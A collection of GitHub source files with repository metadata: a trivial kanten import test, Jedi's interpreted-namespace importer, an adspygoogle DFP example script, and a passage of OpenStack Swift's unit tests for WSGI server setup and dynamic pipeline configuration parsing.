"id": "830e473680a2bd6df498d9fba8b357c0fe43449d",
"size": "577",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "toontown/distributed/ToontownDistrict.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1441"
},
{
"name": "PLSQL",
"bytes": "901"
},
{
"name": "Python",
"bytes": "15617225"
},
{
"name": "Shell",
"bytes": "182"
}
],
"symlink_target": ""
}
|
def test_simple():
import kanten
|
{
"content_hash": "a3e95d2b486a02b7f03670551c3d11c4",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 18,
"avg_line_length": 9.75,
"alnum_prop": 0.6410256410256411,
"repo_name": "ivanov/kanten",
"id": "084af8693f288a7c65f77be948363353deee69f4",
"size": "39",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test_kanten.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "467"
},
{
"name": "Python",
"bytes": "33048"
}
],
"symlink_target": ""
}
|
"""
Module to handle interpreted Python objects.
"""
import itertools
import tokenize
from jedi.parser import representation as pr
class ObjectImporter(object):
"""
Import objects in "raw" namespace such as :func:`locals`.
"""
def __init__(self, scope):
self.scope = scope
count = itertools.count()
self._genname = lambda: '*jedi-%s*' % next(count)
"""
Generate unique variable names to avoid name collision.
To avoid name collision to already defined names, generated
names are invalid as Python identifier.
"""
def import_raw_namespace(self, raw_namespace):
"""
Import interpreted Python objects in a namespace.
Three kinds of objects are treated here.
1. Functions and classes. The objects imported like this::
from os.path import join
2. Modules. The objects imported like this::
import os
3. Instances. The objects created like this::
from datetime import datetime
dt = datetime(2013, 1, 1)
:type raw_namespace: dict
:arg raw_namespace: e.g., the dict given by `locals`
"""
scope = self.scope
for (variable, obj) in raw_namespace.items():
objname = getattr(obj, '__name__', None)
# Import functions and classes
module = getattr(obj, '__module__', None)
if module and objname:
fakeimport = self.make_fakeimport(module, objname, variable)
scope.add_import(fakeimport)
continue
# Import modules
if getattr(obj, '__file__', None) and objname:
fakeimport = self.make_fakeimport(objname)
scope.add_import(fakeimport)
continue
# Import instances
objclass = getattr(obj, '__class__', None)
module = getattr(objclass, '__module__', None)
if objclass and module:
alias = self._genname()
fakeimport = self.make_fakeimport(module, objclass.__name__,
alias)
fakestmt = self.make_fakestatement(variable, alias, call=True)
scope.add_import(fakeimport)
scope.add_statement(fakestmt)
continue
def make_fakeimport(self, module, variable=None, alias=None):
"""
Make a fake import object.
The following statements are created depending on what parameters
are given:
- only `module`: ``import <module>``
- `module` and `variable`: ``from <module> import <variable>``
- all: ``from <module> import <variable> as <alias>``
:type module: str
:arg module: ``<module>`` part in ``from <module> import ...``
:type variable: str
:arg variable: ``<variable>`` part in ``from ... import <variable>``
:type alias: str
:arg alias: ``<alias>`` part in ``... import ... as <alias>``.
:rtype: :class:`parsing_representation.Import`
"""
submodule = self.scope._sub_module
if variable:
varname = pr.Name(
module=submodule,
names=[(variable, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
varname = None
modname = pr.Name(
module=submodule,
names=[(module, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
if alias:
aliasname = pr.Name(
module=submodule,
names=[(alias, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
aliasname = None
if varname:
fakeimport = pr.Import(
module=submodule,
namespace=varname,
from_ns=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
else:
fakeimport = pr.Import(
module=submodule,
namespace=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
return fakeimport
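    # Illustrative (comment added, not in the original source):
    #   make_fakeimport('os')               -> represents ``import os``
    #   make_fakeimport('os.path', 'join')  -> ``from os.path import join``
    #   make_fakeimport('os.path', 'join', 'j')
    #                                       -> ``from os.path import join as j``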
def make_fakestatement(self, lhs, rhs, call=False):
"""
Make a fake statement object that represents ``lhs = rhs``.
:type call: bool
:arg call: When `call` is true, make a fake statement that represents
``lhs = rhs()``.
:rtype: :class:`parsing_representation.Statement`
"""
submodule = self.scope._sub_module
lhsname = pr.Name(
module=submodule,
names=[(lhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
rhsname = pr.Name(
module=submodule,
names=[(rhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
token_list = [lhsname, (tokenize.OP, '=', (0, 0)), rhsname]
if call:
token_list.extend([
(tokenize.OP, '(', (0, 0)),
(tokenize.OP, ')', (0, 0)),
])
return pr.Statement(
module=submodule,
token_list=token_list,
start_pos=(0, 0),
end_pos=(None, None))
|
{
"content_hash": "c0e91dfc045ba5db993925ff959863de",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 78,
"avg_line_length": 32.27218934911242,
"alnum_prop": 0.5031169783645031,
"repo_name": "leonth/private-configs",
"id": "dadf1b28c8dbcc174e4515b8a1f4b60ca93fcbbf",
"size": "5454",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sublime-text-3/Packages/Jedi - Python autocompletion/jedi/interpret.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1370403"
},
{
"name": "Shell",
"bytes": "1449"
}
],
"symlink_target": ""
}
|
"""This code example gets a line item creative association (LICA) by the line
item and creative id. To determine which line items exist, run
get_all_line_items.py. To determine which creatives exist, run
get_all_creatives.py."""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service.
lica_service = client.GetService(
'LineItemCreativeAssociationService', version='v201204')
# Set line item and creative id to use to retrieve the LICA.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
creative_id = 'INSERT_CREATIVE_ID_HERE'
# Get LICA.
lica = lica_service.GetLineItemCreativeAssociation(line_item_id, creative_id)[0]
# Display results.
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['lineItemId'], lica['creativeId'],
lica['status']))
|
{
"content_hash": "a36caf14f9ef5e36066ea6e0e2fa2372",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 80,
"avg_line_length": 35.4,
"alnum_prop": 0.6908797417271993,
"repo_name": "krux/adspygoogle",
"id": "c3d900c13a14d55456fb2482af26c793738b4ee9",
"size": "1857",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/adspygoogle/dfp/v201204/get_lica.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "10581"
},
{
"name": "Python",
"bytes": "2263332"
}
],
"symlink_target": ""
}
|
""" Tests for swift.common.wsgi """
from __future__ import with_statement
import errno
import logging
import mimetools
import socket
import unittest
import os
import re
import pickle
from textwrap import dedent
from gzip import GzipFile
from StringIO import StringIO
from collections import defaultdict
from contextlib import contextmanager, closing
from urllib import quote
from eventlet import listen
import swift
from swift.common.swob import Request
from swift.common import wsgi, utils, ring
from test.unit import temptree
from mock import patch
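# Write minimal serialized account/container/object rings (two replicas over
# two devices, partition shift 30) so the proxy-server apps built in the
# tests below can load rings without a real Swift deployment.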
def _fake_rings(tmpdir):
with closing(GzipFile(os.path.join(tmpdir, 'account.ring.gz'), 'wb')) as f:
pickle.dump(ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
[{'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6012},
{'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6022}], 30),
f)
with closing(GzipFile(os.path.join(tmpdir, 'container.ring.gz'), 'wb')) as f:
pickle.dump(ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
[{'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6011},
{'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6021}], 30),
f)
with closing(GzipFile(os.path.join(tmpdir, 'object.ring.gz'), 'wb')) as f:
pickle.dump(ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
[{'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6010},
{'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6020}], 30),
f)
class TestWSGI(unittest.TestCase):
""" Tests for swift.common.wsgi """
def setUp(self):
utils.HASH_PATH_PREFIX = 'startcap'
self._orig_parsetype = mimetools.Message.parsetype
def tearDown(self):
mimetools.Message.parsetype = self._orig_parsetype
def test_monkey_patch_mimetools(self):
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).type, 'text/plain')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).plisttext, '')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).maintype, 'text')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).subtype, 'plain')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).type, 'text/html')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).plisttext,
'; charset=ISO-8859-4')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).maintype, 'text')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).subtype, 'html')
wsgi.monkey_patch_mimetools()
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).type, None)
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).plisttext, '')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).maintype, None)
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).subtype, None)
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).type, 'text/html')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).plisttext,
'; charset=ISO-8859-4')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).maintype, 'text')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).subtype, 'html')
def test_init_request_processor(self):
config = """
[DEFAULT]
swift_dir = TEMPDIR
[pipeline:main]
pipeline = catch_errors proxy-server
[app:proxy-server]
use = egg:swift#proxy
conn_timeout = 0.2
[filter:catch_errors]
use = egg:swift#catch_errors
"""
contents = dedent(config)
with temptree(['proxy-server.conf']) as t:
conf_file = os.path.join(t, 'proxy-server.conf')
with open(conf_file, 'w') as f:
f.write(contents.replace('TEMPDIR', t))
_fake_rings(t)
app, conf, logger, log_name = wsgi.init_request_processor(
conf_file, 'proxy-server')
# verify pipeline is catch_errors -> proxy-server
expected = swift.common.middleware.catch_errors.CatchErrorMiddleware
self.assert_(isinstance(app, expected))
self.assert_(isinstance(app.app, swift.proxy.server.Application))
# config settings applied to app instance
self.assertEquals(0.2, app.app.conn_timeout)
# appconfig returns values from 'proxy-server' section
expected = {
'__file__': conf_file,
'here': os.path.dirname(conf_file),
'conn_timeout': '0.2',
'swift_dir': t,
}
self.assertEquals(expected, conf)
# logger works
logger.info('testing')
self.assertEquals('proxy-server', log_name)
def test_init_request_processor_from_conf_dir(self):
config_dir = {
'proxy-server.conf.d/pipeline.conf': """
[pipeline:main]
pipeline = catch_errors proxy-server
""",
'proxy-server.conf.d/app.conf': """
[app:proxy-server]
use = egg:swift#proxy
conn_timeout = 0.2
""",
'proxy-server.conf.d/catch-errors.conf': """
[filter:catch_errors]
use = egg:swift#catch_errors
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as conf_root:
conf_dir = os.path.join(conf_root, 'proxy-server.conf.d')
with open(os.path.join(conf_dir, 'swift.conf'), 'w') as f:
f.write('[DEFAULT]\nswift_dir = %s' % conf_root)
_fake_rings(conf_root)
app, conf, logger, log_name = wsgi.init_request_processor(
conf_dir, 'proxy-server')
# verify pipeline is catch_errors -> proxy-server
expected = swift.common.middleware.catch_errors.CatchErrorMiddleware
self.assert_(isinstance(app, expected))
self.assert_(isinstance(app.app, swift.proxy.server.Application))
# config settings applied to app instance
self.assertEquals(0.2, app.app.conn_timeout)
# appconfig returns values from 'proxy-server' section
expected = {
'__file__': conf_dir,
'here': conf_dir,
'conn_timeout': '0.2',
'dynamic_pipelines': 'False',
'swift_dir': conf_root,
}
self.assertEquals(expected, conf)
# logger works
logger.info('testing')
self.assertEquals('proxy-server', log_name)
def test_init_request_processor_with_dynamic_pipeline(self):
config_dir = {
'proxy-server.conf.d/pipeline.conf': """
[DEFAULT]
dynamic_pipelines: True
[pipeline:main]
pipeline = tempauth proxy-server
""",
'proxy-server.conf.d/app.conf': """
[app:proxy-server]
use = egg:swift#proxy
""",
'proxy-server.conf.d/catch-errors.conf': """
[filter:catch_errors]
use = egg:swift#catch_errors
pipeline = main
before = #start healthcheck
""",
'proxy-server.conf.d/others.conf': """
[filter:tempauth]
use = egg:swift#tempauth
[filter:keystone]
use = egg:swift#keystoneauth
before = tempauth proxy-server
pipeline = main
[filter:healthcheck]
use = egg:swift#healthcheck
before = #start
pipeline = main
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as conf_root:
conf_dir = os.path.join(conf_root, 'proxy-server.conf.d')
with open(os.path.join(conf_dir, 'swift.conf'), 'w') as f:
f.write('[DEFAULT]\nswift_dir = %s' % conf_root)
_fake_rings(conf_root)
app, conf, logger, log_name = wsgi.init_request_processor(
conf_dir, 'proxy-server')
# verify pipeline
def get_pipeline(app):
yield app
while hasattr(app, 'app'):
app = app.app
yield app
def get_pipeline_class_names(app):
for ware in get_pipeline(app):
yield ware.__class__.__name__
expected_classnames = [
'CatchErrorMiddleware',
'HealthCheckMiddleware',
'KeystoneAuth',
'TempAuth',
'Application']
pipeline_classnames = list(get_pipeline_class_names(app))
self.assertEquals(expected_classnames, pipeline_classnames)
def test_get_socket(self):
# stubs
conf = {}
ssl_conf = {
'cert_file': '',
'key_file': '',
}
# mocks
class MockSocket():
def __init__(self):
self.opts = defaultdict(dict)
def setsockopt(self, level, optname, value):
self.opts[level][optname] = value
def mock_listen(*args, **kwargs):
return MockSocket()
class MockSsl():
def __init__(self):
self.wrap_socket_called = []
def wrap_socket(self, sock, **kwargs):
self.wrap_socket_called.append(kwargs)
return sock
# patch
old_listen = wsgi.listen
old_ssl = wsgi.ssl
try:
wsgi.listen = mock_listen
wsgi.ssl = MockSsl()
# test
sock = wsgi.get_socket(conf)
# assert
self.assert_(isinstance(sock, MockSocket))
expected_socket_opts = {
socket.SOL_SOCKET: {
socket.SO_REUSEADDR: 1,
socket.SO_KEEPALIVE: 1,
},
}
if hasattr(socket, 'TCP_KEEPIDLE'):
expected_socket_opts[socket.IPPROTO_TCP] = {
socket.TCP_KEEPIDLE: 600,
}
self.assertEquals(sock.opts, expected_socket_opts)
# test ssl
sock = wsgi.get_socket(ssl_conf)
expected_kwargs = {
'certfile': '',
'keyfile': '',
}
self.assertEquals(wsgi.ssl.wrap_socket_called, [expected_kwargs])
finally:
wsgi.listen = old_listen
wsgi.ssl = old_ssl
def test_address_in_use(self):
# stubs
conf = {}
# mocks
def mock_listen(*args, **kwargs):
raise socket.error(errno.EADDRINUSE)
def value_error_listen(*args, **kwargs):
raise ValueError('fake')
def mock_sleep(*args):
pass
class MockTime():
"""Fast clock advances 10 seconds after every call to time
"""
def __init__(self):
self.current_time = old_time.time()
def time(self, *args, **kwargs):
rv = self.current_time
# advance for next call
self.current_time += 10
return rv
old_listen = wsgi.listen
old_sleep = wsgi.sleep
old_time = wsgi.time
try:
wsgi.listen = mock_listen
wsgi.sleep = mock_sleep
wsgi.time = MockTime()
# test error
self.assertRaises(Exception, wsgi.get_socket, conf)
# different error
wsgi.listen = value_error_listen
self.assertRaises(ValueError, wsgi.get_socket, conf)
finally:
wsgi.listen = old_listen
wsgi.sleep = old_sleep
wsgi.time = old_time
def test_run_server(self):
config = """
[DEFAULT]
eventlet_debug = yes
client_timeout = 30
max_clients = 1000
swift_dir = TEMPDIR
[pipeline:main]
pipeline = proxy-server
[app:proxy-server]
use = egg:swift#proxy
# while "set" values normally override default
set client_timeout = 20
# this section is not in conf during run_server
set max_clients = 10
"""
contents = dedent(config)
with temptree(['proxy-server.conf']) as t:
conf_file = os.path.join(t, 'proxy-server.conf')
with open(conf_file, 'w') as f:
f.write(contents.replace('TEMPDIR', t))
_fake_rings(t)
with patch('swift.common.wsgi.wsgi') as _wsgi:
with patch('swift.common.wsgi.eventlet') as _eventlet:
conf = wsgi.appconfig(conf_file)
logger = logging.getLogger('test')
sock = listen(('localhost', 0))
wsgi.run_server(conf, logger, sock)
self.assertEquals('HTTP/1.0',
_wsgi.HttpProtocol.default_request_version)
self.assertEquals(30, _wsgi.WRITE_TIMEOUT)
_eventlet.hubs.use_hub.assert_called_with(utils.get_hub())
_eventlet.patcher.monkey_patch.assert_called_with(all=False,
socket=True)
_eventlet.debug.hub_exceptions.assert_called_with(True)
                self.assert_(_wsgi.server.called)
args, kwargs = _wsgi.server.call_args
server_sock, server_app, server_logger = args
self.assertEquals(sock, server_sock)
self.assert_(isinstance(server_app, swift.proxy.server.Application))
self.assertEquals(20, server_app.client_timeout)
self.assert_(isinstance(server_logger, wsgi.NullLogger))
self.assert_('custom_pool' in kwargs)
self.assertEquals(1000, kwargs['custom_pool'].size)
def test_run_server_conf_dir(self):
config_dir = {
'proxy-server.conf.d/pipeline.conf': """
[pipeline:main]
pipeline = proxy-server
""",
'proxy-server.conf.d/app.conf': """
[app:proxy-server]
use = egg:swift#proxy
""",
'proxy-server.conf.d/default.conf': """
[DEFAULT]
eventlet_debug = yes
client_timeout = 30
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as conf_root:
conf_dir = os.path.join(conf_root, 'proxy-server.conf.d')
with open(os.path.join(conf_dir, 'swift.conf'), 'w') as f:
f.write('[DEFAULT]\nswift_dir = %s' % conf_root)
_fake_rings(conf_root)
with patch('swift.common.wsgi.wsgi') as _wsgi:
with patch('swift.common.wsgi.eventlet') as _eventlet:
with patch.dict('os.environ', {'TZ': ''}):
conf = wsgi.appconfig(conf_dir)
logger = logging.getLogger('test')
sock = listen(('localhost', 0))
wsgi.run_server(conf, logger, sock)
            self.assert_(os.environ['TZ'] != '')
self.assertEquals('HTTP/1.0',
_wsgi.HttpProtocol.default_request_version)
self.assertEquals(30, _wsgi.WRITE_TIMEOUT)
_eventlet.hubs.use_hub.assert_called_with(utils.get_hub())
_eventlet.patcher.monkey_patch.assert_called_with(all=False,
socket=True)
_eventlet.debug.hub_exceptions.assert_called_with(True)
                _wsgi.server.assert_called()
                self.assert_(_wsgi.server.called)
args, kwargs = _wsgi.server.call_args
server_sock, server_app, server_logger = args
self.assertEquals(sock, server_sock)
self.assert_(isinstance(server_app, swift.proxy.server.Application))
self.assert_(isinstance(server_logger, wsgi.NullLogger))
self.assert_('custom_pool' in kwargs)
def test_appconfig_dir_ignores_hidden_files(self):
config_dir = {
'server.conf.d/01.conf': """
[app:main]
use = egg:swift#proxy
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[app:main]
use = egg:swift#proxy
port = 8081
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = wsgi.appconfig(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'here': os.path.join(path, 'server.conf.d'),
'dynamic_pipelines': 'False',
'port': '8080',
}
self.assertEquals(conf, expected)
def test_pre_auth_wsgi_input(self):
oldenv = {}
newenv = wsgi.make_pre_authed_env(oldenv)
self.assertTrue('wsgi.input' in newenv)
self.assertEquals(newenv['wsgi.input'].read(), '')
oldenv = {'wsgi.input': StringIO('original wsgi.input')}
newenv = wsgi.make_pre_authed_env(oldenv)
self.assertTrue('wsgi.input' in newenv)
self.assertEquals(newenv['wsgi.input'].read(), '')
oldenv = {'swift.source': 'UT'}
newenv = wsgi.make_pre_authed_env(oldenv)
self.assertEquals(newenv['swift.source'], 'UT')
oldenv = {'swift.source': 'UT'}
newenv = wsgi.make_pre_authed_env(oldenv, swift_source='SA')
self.assertEquals(newenv['swift.source'], 'SA')
def test_pre_auth_req(self):
class FakeReq(object):
@classmethod
def fake_blank(cls, path, environ={}, body='', headers={}):
self.assertEquals(environ['swift.authorize']('test'), None)
self.assertFalse('HTTP_X_TRANS_ID' in environ)
was_blank = Request.blank
Request.blank = FakeReq.fake_blank
wsgi.make_pre_authed_request({'HTTP_X_TRANS_ID': '1234'},
'PUT', '/', body='tester', headers={})
wsgi.make_pre_authed_request({'HTTP_X_TRANS_ID': '1234'},
'PUT', '/', headers={})
Request.blank = was_blank
def test_pre_auth_req_with_quoted_path(self):
r = wsgi.make_pre_authed_request(
{'HTTP_X_TRANS_ID': '1234'}, 'PUT', path=quote('/a space'),
body='tester', headers={})
self.assertEquals(r.path, quote('/a space'))
def test_pre_auth_req_drops_query(self):
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path')
self.assertEquals(r.query_string, 'original')
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path?replacement')
self.assertEquals(r.query_string, 'replacement')
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path?')
self.assertEquals(r.query_string, '')
def test_pre_auth_req_with_body(self):
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path', 'the body')
self.assertEquals(r.body, 'the body')
def test_pre_auth_creates_script_name(self):
e = wsgi.make_pre_authed_env({})
self.assertTrue('SCRIPT_NAME' in e)
def test_pre_auth_copies_script_name(self):
e = wsgi.make_pre_authed_env({'SCRIPT_NAME': '/script_name'})
self.assertEquals(e['SCRIPT_NAME'], '/script_name')
def test_pre_auth_copies_script_name_unless_path_overridden(self):
e = wsgi.make_pre_authed_env({'SCRIPT_NAME': '/script_name'},
path='/override')
self.assertEquals(e['SCRIPT_NAME'], '')
self.assertEquals(e['PATH_INFO'], '/override')
def test_pre_auth_req_swift_source(self):
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path', 'the body',
swift_source='UT')
self.assertEquals(r.body, 'the body')
self.assertEquals(r.environ['swift.source'], 'UT')
def test_pre_auth_req_with_empty_env_no_path(self):
r = wsgi.make_pre_authed_request(
{}, 'GET')
self.assertEquals(r.path, quote(''))
self.assertTrue('SCRIPT_NAME' in r.environ)
self.assertTrue('PATH_INFO' in r.environ)
def test_pre_auth_req_with_env_path(self):
r = wsgi.make_pre_authed_request(
{'PATH_INFO': '/unquoted path with %20'}, 'GET')
self.assertEquals(r.path, quote('/unquoted path with %20'))
self.assertEquals(r.environ['SCRIPT_NAME'], '')
def test_pre_auth_req_with_env_script(self):
r = wsgi.make_pre_authed_request({'SCRIPT_NAME': '/hello'}, 'GET')
self.assertEquals(r.path, quote('/hello'))
def test_pre_auth_req_with_env_path_and_script(self):
env = {'PATH_INFO': '/unquoted path with %20',
'SCRIPT_NAME': '/script'}
r = wsgi.make_pre_authed_request(env, 'GET')
expected_path = quote(env['SCRIPT_NAME'] + env['PATH_INFO'])
self.assertEquals(r.path, expected_path)
env = {'PATH_INFO': '', 'SCRIPT_NAME': '/script'}
r = wsgi.make_pre_authed_request(env, 'GET')
self.assertEquals(r.path, '/script')
env = {'PATH_INFO': '/path', 'SCRIPT_NAME': ''}
r = wsgi.make_pre_authed_request(env, 'GET')
self.assertEquals(r.path, '/path')
env = {'PATH_INFO': '', 'SCRIPT_NAME': ''}
r = wsgi.make_pre_authed_request(env, 'GET')
self.assertEquals(r.path, '')
def test_pre_auth_req_path_overrides_env(self):
env = {'PATH_INFO': '/path', 'SCRIPT_NAME': '/script'}
r = wsgi.make_pre_authed_request(env, 'GET', '/override')
self.assertEquals(r.path, '/override')
self.assertEquals(r.environ['SCRIPT_NAME'], '')
self.assertEquals(r.environ['PATH_INFO'], '/override')
class TestWSGIContext(unittest.TestCase):
def test_app_call(self):
statuses = ['200 Ok', '404 Not Found']
def app(env, start_response):
start_response(statuses.pop(0), [('Content-Length', '3')])
yield 'Ok\n'
wc = wsgi.WSGIContext(app)
r = Request.blank('/')
it = wc._app_call(r.environ)
self.assertEquals(wc._response_status, '200 Ok')
self.assertEquals(''.join(it), 'Ok\n')
r = Request.blank('/')
it = wc._app_call(r.environ)
self.assertEquals(wc._response_status, '404 Not Found')
self.assertEquals(''.join(it), 'Ok\n')
@contextmanager
def temp_config(contents):
with temptree(['proxy-server.conf']) as t:
conf_dir = os.path.join(t, 'proxy-server.conf.d')
os.mkdir(conf_dir)
conf_file = os.path.join(conf_dir, 'default.conf')
        with open(conf_file, 'w') as f:
            f.write(contents)
loader = wsgi.ConfigDirLoader(conf_dir)
yield loader.parser
class TestConfigParsing(unittest.TestCase):
def setUp(self):
self.basic_config = dedent("""
[DEFAULT]
dynamic_pipelines: True
[pipeline:main]
pipeline = catch_errors proxy-server
[app:proxy-server]
use = egg:swift#proxy
conn_timeout = 0.2
[filter:catch_errors]
use = egg:swift#catch_errors
""")
def test_basic_interpolation(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:attheend]
pipeline = main
after = between
[filter:between]
pipeline = main
before = proxy-server
after = catch_errors
[filter:atthestart]
pipeline = main
before = catch_errors
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'atthestart catch_errors between attheend proxy-server'
self.assertEquals(expected, pipeline)
def test_provides(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:kerberos]
pipeline = main
provides = authentication
before = proxy-server provides:authorization
after = catch_errors
[filter:ldap]
pipeline = main
provides = authorization
before = proxy-server
after = provides:authentication catch_errors
[filter:coffee]
pipeline = main
provides = java
before = provides:authentication provides:authorization
after = catch_errors
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'catch_errors coffee kerberos ldap proxy-server'
self.assertEquals(expected, pipeline)
def test_nonexistent_constraints(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:deluded]
pipeline = main
before = doesnotexist
after = provides:nonexistent
[filter:fool]
pipeline = main
provides = authorization
before = imaginary, figmental
after = illusive; fictional; hallucinatory
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = set(['catch_errors', 'proxy-server', 'deluded', 'fool'])
            actual = set(re.split(r'\s+', pipeline))
self.assertEquals(expected, actual)
def test_multiple_pipelines(self):
config_text = dedent(self.basic_config) + dedent("""
[composite:superproxy]
use = egg:swift#superproxy
[pipeline:secondary]
pipeline = process_successes superproxy
[pipeline:shouldbeignored]
pipeline = proxy-server
[filter:shortbus]
pipeline = main
after = catch_errors process_successes
before = proxy-server superproxy
[filter:amalgamut]
pipeline = main secondary
before = catch_errors process_successes
[filter:not_present_in_a_pipeline]
before = catch_errors
[filter:targets_a_nonexistent_pipeline]
pipeline = doesnotexist
before = catch_errors
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'amalgamut catch_errors shortbus proxy-server'
self.assertEquals(expected, pipeline)
pipeline = config.get('pipeline:secondary', 'pipeline')
expected = 'amalgamut process_successes superproxy'
self.assertEquals(expected, pipeline)
pipeline = config.get('pipeline:shouldbeignored', 'pipeline')
self.assertEquals('proxy-server', pipeline)
def test_special_symbols(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:early]
pipeline = main
provides = authentication
before = #start
[filter:yet-earlier]
pipeline = main
provides = authentication
before = #start early
[filter:late]
pipeline = main
provides = authorization
after = #end
[filter:yet-later]
pipeline = main
after = #end
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'yet-earlier early catch_errors ' + \
'late yet-later proxy-server'
self.assertEquals(expected, pipeline)
def test_duplicate_items(self):
config_text = dedent(self.basic_config) + dedent("""
[pipeline:duplicates]
pipeline = filtera filterb filtera filterb proxy-server
[filter:filtera]
pipeline = duplicates
[filter:filterb]
pipeline = duplicates
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:duplicates', 'pipeline')
expected = 'filtera filterb filtera filterb proxy-server'
self.assertEquals(expected, pipeline)
def test_nothing_goes_after_app(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:after_app]
pipeline = main
after = proxy-server
""")
        try:
            with temp_config(config_text) as config:
                pass
        except Exception as e:
            self.assertEquals(wsgi.ConfigFileError, e.__class__)
        else:
            self.fail('wsgi.ConfigFileError was not raised')
def test_must_have_static_pipeline(self):
config_text = dedent(self.basic_config) + dedent("""
[pipeline:empty]
[app:proxy-server]
pipeline = empty
[filter:filtera]
pipeline = empty
after = proxy-server
""")
        try:
            with temp_config(config_text) as config:
                pass
        except Exception as e:
            self.assertEquals(wsgi.ConfigFileError, e.__class__)
        else:
            self.fail('wsgi.ConfigFileError was not raised')
def test_circular_dependencies(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:filter1]
pipeline = main
after = catch_errors
[filter:filter2]
pipeline = main
before = catch_errors
after = filter1
""")
        try:
            with temp_config(config_text) as config:
                pass
        except Exception as e:
            self.assertEquals(wsgi.ConfigFileError, e.__class__)
        else:
            self.fail('wsgi.ConfigFileError was not raised')
if __name__ == '__main__':
